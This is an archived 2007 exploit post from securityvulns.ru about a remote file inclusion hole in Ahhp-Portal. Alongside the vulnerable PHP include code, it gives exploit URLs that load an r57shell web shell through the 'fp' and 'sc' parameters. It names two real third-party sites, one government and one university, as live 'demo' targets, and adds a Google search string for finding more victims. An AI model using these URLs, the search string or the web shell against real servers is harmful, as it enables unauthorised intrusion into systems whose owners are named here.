Computer Security
[EN] securityvulns.ru
no-pyccku

  

Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  netbingo v 2000 >> RFI

  HTMLeditbox & 2.2 >> RFI

  WordPress v2.1.3 >> remote file include~

  HYIP Manager Pro Script  >> Remote file Include

From:okan alp <codexploder_(at)_hotmail.com>
Date:25.04.2007
Subject:Ahhp(php)-Portal Remote File Inclusion

Ahhp-Portal Remote File Inclusion


SЭTE:www.ahhope.org

Demo:http://xinan.ahtcm.edu.cn
Demo2http://www.hfspaq.gov.cn


Vul Code:

                       <?
if ($sc=='')
include($fp.".php");
else
include($sc."/".$fp.".php");
?>


------------------------------------------------

example:

http://site/page.php?fp=r57shell?
http://site/page.php?sc=r57shell?


////////////////////////////////////////////////////

Credit : CodeXpLoder'tq

mail   : codexploder[at]hotmail[dot]com

site   : expw0rm.com

###############################################

Google :

"page.php?fp"

// Exploit Worm www.expw0rm.com

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru